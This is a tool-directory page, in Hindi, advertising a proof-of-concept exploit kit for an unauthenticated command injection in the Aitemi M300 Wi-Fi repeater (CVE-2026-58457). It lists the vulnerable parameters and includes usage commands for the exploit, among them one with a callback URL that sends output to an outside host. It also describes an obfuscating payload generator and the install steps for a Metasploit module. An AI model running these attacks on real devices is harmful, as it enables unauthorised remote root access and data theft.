Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-58457 — CVE-2026-58457 के लिए PoC उपकरण: शेन्ज़ेन Aitemi M300 वाई-फाई रिपीटर (MT02) पर दूरस्थ रूट की ओर ले जाने वाला बिना प्रमाणीकरण के OS कमांड इंजेक्शन। इसमें शोषण, सत्यापनकर्ता, पेलोड जनरेटर और Metasploit मॉड्यूल शामिल हैं। केवल शैक्षिक और अधिकृत पेंटेस्टिंग के लिए। | Kitploit
उपकरण/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
शोषण फ्रेमवर्कIoT सुरक्षापेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
लर्निंग और शिक्षा
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

CVE-2026-58457 के लिए PoC उपकरण: शेन्ज़ेन Aitemi M300 वाई-फाई रिपीटर (MT02) पर दूरस्थ रूट की ओर ले जाने वाला बिना प्रमाणीकरण के OS कमांड इंजेक्शन। इसमें शोषण, सत्यापनकर्ता, पेलोड जनरेटर और Metasploit मॉड्यूल शामिल हैं। केवल शैक्षिक और अधिकृत पेंटेस्टिंग के लिए।

रिपॉजिटरी देखें
251 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-58457 - शेनझेन Aitemi M300 वाई-फ़ाई रिपीटर में अनधिकृत OS कमांड इंजेक्शन

[!WARNING] यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए AS IS प्रदान किया गया है। इस PoC का उपयोग उत्पादन प्रणालियों, साझा वातावरण, या किसी अनधिकृत लक्ष्य पर न करें।

  • इस कोड को चलाने या होस्ट करने से एंटीवायरस डिटेक्शन, सुरक्षा निगरानी अलर्ट, या दुरुपयोग होने पर कानूनी परिणाम ट्रिगर हो सकते हैं।
  • लेखक और रिपॉजिटरी अनुरक्षक इस कोड से उत्पन्न किसी भी क्षति, दुरुपयोग, या अवैध गतिविधि के लिए कोई दायित्व नहीं मानते हैं।
  • उचित प्राधिकरण के साथ विशेष रूप से पृथक प्रयोगशाला वातावरण में उपयोग करें। केवल रक्षात्मक अनुसंधान, भेद्यता विश्लेषण, और ब्लू-टीम परीक्षण के लिए उद्देश्यित।

भेद्यता सारांश

एक अनधिकृत OS कमांड इंजेक्शन भेद्यता smacfilter_conf हैंडलर में मौजूद है। name, enable, और mac GET पैरामीटर बिना स्वच्छ किए एक sprintf() कॉल में पास किए जाते हैं जो के रूप में निष्पादित UCI कमांड का निर्माण करता है।

root
  • गंभीरता: क्रिटिकल (CVSS 9.8)
  • प्रभाव: बिना प्रमाणीकरण की आवश्यकता के दूरस्थ रूट कमांड निष्पादन

शामिल उपकरण

  • poc.py - HTTPS समर्थन, पुनर्प्रयास, टाइमआउट, और कॉलबैक एक्सफ़िल्ट्रेशन के साथ पूर्ण-विशेषता वाला शोषण।
  • val.py - सुरक्षित, निष्क्रिय भेद्यता सत्यापक (हानिरहित id कमांड का उपयोग करता है)।
  • gen.py - कई अस्पष्टता तकनीकों के साथ उन्नत पेलोड जनरेटर।
  • MITIGATIONS.md - अनुशंसित रक्षात्मक उपाय।
  • Metasploit मॉड्यूल - exploit/ निर्देशिका में उपलब्ध।

स्थापना

root@kitploit:~
pip install requests

त्वरित उपयोग

  1. मान्य करें (सुरक्षित)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. शोषण (केवल अधिकृत परीक्षण)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. अस्पष्ट पेलोड उत्पन्न करें
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. मॉड्यूल को स्थानांतरित करें
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# या मुख्य MSF पथ: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. सभी पुनः लोड करें
root@kitploit:~
msfconsole -q -x "reload_all"

संदर्भ

  • CVE-2026-58457
  • VulnCheck Advisory
  • GitHub Disclosure

स्टार्स और योगदान का स्वागत है - विशेष रूप से बाईपास या अतिरिक्त फर्मवेयर वेरिएंट में सुधार।

टूल डाउनलोड करें